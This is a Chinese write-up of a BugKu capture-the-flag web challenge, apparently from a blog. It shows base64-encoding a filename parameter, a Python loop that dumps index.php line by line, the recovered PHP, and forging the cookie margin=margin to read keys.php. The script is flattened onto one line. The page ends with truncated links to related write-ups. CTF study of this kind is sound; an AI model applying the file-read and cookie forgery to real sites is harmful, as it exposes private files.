BugKu:cookies 欺骗
查看源码后没有可用信息
观察url发现参数filename的值加密了
解密后filename=keys.txt
尝试用修改参数filename的值为index.php(注意此处index.php要用base64加密为aW5kZXgucGhw)
发现参数line没有给值,随意赋值如3,出现
写脚本抓原代码,先试一下有多少行,100,50,25,20都无回显,大约定在30
import requests
a=30
for i in range(a):url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"s=requests.get(url)print (s.text)
读取的源码:
<?phperror_reporting(0);$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");$line=isset($_GET['line'])?intval($_GET['line']):0;if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");$file_list = array('0' =>'keys.txt','1' =>'index.php',);if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){$file_list[2]='keys.php';}if(in_array($file, $file_list)){$fa = file($file);echo $fa[$line];}?>
分析源代码,当cookie的margin=margin时,可以访问一个keys.php文件
注意把参数filename的值改为base64加密后的keys.php
BugKu:cookies 欺骗相关推荐
- bugku cookies
bugku cookies 又是一道花费比奖励还高的bugku web的题: 开环境后是一堆乱码 一开始猜测乱码是不是提示 但是后来想了一下,这是web的题又不是misc的题,所以应该不是编码 习惯性 ...
- 七禧舞曲 php,CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day
应该是通杀所有PHP版本 .最新版本没有测试.从补丁来看,漏洞依然存在. 这是一个神级漏洞,体现了程序员的神逻辑. 看代码 admin/admin_check.php $CD_Version='V1. ...
- ctf write cookies欺骗
题目: 打开网页出现: 发现对line和filename通过get方式传参,其中filename=a2V5cy50eHQ= 猜测是使用了base64加密,解密a2V5cy50eHQ=得到: 可见可以通 ...
- Web安全学习思维导图,[web入门菜鸡萌新必备]
写在前面,自制了一个web安全学习的思维导图,写的并不是很全面,自己本身其实也是个弟弟, 总结了一些师傅们的资源,希望大家给予一定的建议和提升的空间,另外也给萌新一个思路吧~ 下面是大纲,可以参考内容 ...
- Bugku—web题解
前言:最近做了一些Bugku入门的web题目,感觉web题挺有趣的,并非是得出flag,而是可以通过一个题目学习到很多知识. 域名解析 题目说把 flag.baidu.com 解析到123.206.8 ...
- Bugku web(1—35)
1.web2 打开网页: 哈哈,其实按下F12你就会发现flag. 2.计算器 打开网页,只是让你输入计算结果,但是发现只能输入一个数字,这时按下F12,修改一下参数,使之可以输入多个数字,修改后输入 ...
- Bugku旧平台web writeup
Web基础 Web2 查看网页源代码,搜索flag KEY{Web-2-bugKssNNikls9100} 计算器 审查元素修改输入字符串长度为2 flag{CTF-bugku-0032} web基础 ...
- [心静不下来系列]bugku web继续 (带了标题)
[2,1]矛盾---------- is_numeric在php里面是 是数字的意思 这个啊,只要是不是纯数字也可以, 试了一下num=1*1 只要是一个字符串就行....不管是算式也好,一串什么其 ...
- bugku web篇
web2 f12查看源代码在注释语句里面 计算器 直接求给的题目 但是对input的最大输入个数做了限制可以直接f12改限制字数也可以bp抓包修改 web基础$_GET $what=$_GET['wh ...
最新文章
- 【原】iOS学习之Quartz2D(1)
- [读书笔记]C#中get与set的用法
- linux添加怎么退出,linux – 是否可以设置’expect’的退出代码
- 2017-2018-1 20155227 《信息安全系统设计基础》第十三周学习总结
- java ranger rest_kafka ranger integration issuse
- 计算机软件和理论学什么,武汉大学计算机软件与理论考研科目有哪些?
- HTML5 Media 原创翻译——第一章(持续更新中)
- java崩溃停在崩溃代码上_通过编写Java代码让Jvm崩溃
- 欧姆龙OMRON PLC程序,威纶触摸屏螺丝机 配方程序。 用ST语言编写程序+威纶触摸屏程序
- 2G维码器-以及4G维码器--基于合宙air202 air720sl luat
- 2021-2022启航出发
- java内存溢出定位
- 一个实用分数类Fraction的Java实现
- USACO section2.4 Cow Tours题解代码
- 可惜知乎没有注销账号的选项
- Datawhale 图神经网络task4
- 输入电阻和输出电阻的意义
- property_get/property_set函数使用
- python 录音翻译_python实现带声音的摩斯码翻译实现方法
- 在IB国际高中学IB哲学是种什么样的体验